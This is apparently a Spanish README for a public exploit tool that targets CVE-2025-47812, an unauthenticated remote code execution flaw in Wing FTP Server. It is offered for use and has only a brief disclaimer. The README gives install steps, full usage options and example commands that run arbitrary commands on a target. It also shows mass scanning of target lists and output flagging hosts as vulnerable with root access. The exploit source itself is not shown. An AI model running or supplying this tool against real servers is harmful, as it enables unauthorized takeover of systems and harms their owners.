## https://sploitus.com/exploit?id=EE1D97CA-BB2C-5839-BEF4-FCC3DA54160F
# 🚀 Wing FTP Exploit - CVE-2025-47812
Exploit mejorado para Wing FTP Server CVE-2025-47812 - Unauthenticated Remote Code Execution (RCE)
## 🔧 Instalación
Clona este repositorio y entra en el directorio:
```bash
git clone https://github.com/0xjuarez/CVE-2025-47812.git
cd CVE-2025-47812
pip install -r requirements.txt
```
O simplemente descarga el script `CVE-2025-47812.py` y ejecútalo.
## 🚀 Uso
```
usage: CVE-2025-47812.py [-h] [-u URL] [-f FILE] [-c COMMAND] [-U USERNAME] [-P PASSWORD] [--check] [-v] [--proxy PROXY] [--timeout TIMEOUT] [-o OUTPUT] [--output-format {txt,json,csv}] [--threads THREADS] [--no-progress]
Exploit para Wing FTP Server CVE-2025-47812 - versión mejorada
opciones:
-h, --help muestra este mensaje
-u URL, --url URL URL objetivo (ej. http://192.168.1.100:5466)
-f FILE, --file FILE archivo con lista de URLs (una por línea)
-c COMMAND, --command COMMAND
comando a ejecutar (por defecto: echo CVE-2025-47812)
-U USERNAME, --username USERNAME
nombre de usuario (default: anonymous)
-P PASSWORD, --password PASSWORD
contraseña (default: vacía)
--check modo verificación: solo comprueba si es vulnerable (usa comando inocuo)
-v, --verbose modo verbose (muestra detalles)
--proxy PROXY proxy (ej. http://127.0.0.1:8080)
--timeout TIMEOUT timeout en segundos (default: 10)
-o OUTPUT, --output OUTPUT
archivo de salida para guardar resultados
--output-format {txt,json,csv}
formato de salida (default: txt)
--threads THREADS número de hilos para escanear múltiples objetivos (default: 5)
--no-progress ocultar barra de progreso
```
## 🎯 Ejemplos básicos
### Probar un solo objetivo y ejecutar un comando:
```bash
python CVE-2025-47812.py -u http://192.168.1.100:5466 -c "whoami" -v
```
### Modo verificación (solo detecta vulnerabilidad):
```bash
python CVE-2025-47812.py -u http://192.168.1.100:5466 --check
```
### Escanear múltiples objetivos desde un archivo:
```bash
python CVE-2025-47812.py -f targets.txt --threads 10 -o resultados.json --output-format json
```
### Usar proxy y verbose:
```bash
python CVE-2025-47812.py -u http://192.168.1.100:5466 --proxy http://127.0.0.1:8080 -v
```
## 📁 Estructura del archivo de targets
El archivo debe contener una URL por línea, por ejemplo:
```
http://192.168.1.10:5466
http://192.168.1.11:5466
https://ftp.miservidor.com:5466
```
## 📊 Formatos de salida
### TXT
```
http://192.168.1.10:5466 - VULNERABLE - usuario: root
http://192.168.1.11:5466 - SEGURO - No vulnerable
```
### JSON
```json
[
{
"target": "http://192.168.1.10:5466",
"vulnerable": true,
"info": "usuario: root"
}
]
```
### CSV
```
Target,Vulnerable,Info
http://192.168.1.10:5466,True,usuario: root
```
## ⚠️ Advertencia
Este exploit está diseñado únicamente para fines educativos y pruebas de seguridad autorizadas. El uso no autorizado de esta herramienta contra sistemas sin consentimiento explícito es ilegal y puede conllevar graves consecuencias legales. Los autores no se responsabilizan del mal uso que se le pueda dar.
## 🤝 Créditos
- Autor original: Sheikh Mohammad Hasan (4m3rr0r) – Descubrimiento y exploit base.
- Mejoras y refactorización: 0xJuarez – Añadidas funcionalidades de escaneo masivo, colores, soporte para proxies, múltiples formatos de salida, y mejoras de usabilidad.
Si te gusta este trabajo, ¡no olvides darle una estrella ⭐ en GitHub!
## 📄 Licencia
Este proyecto está licenciado bajo la MIT License – ver el archivo LICENSE para más detalles.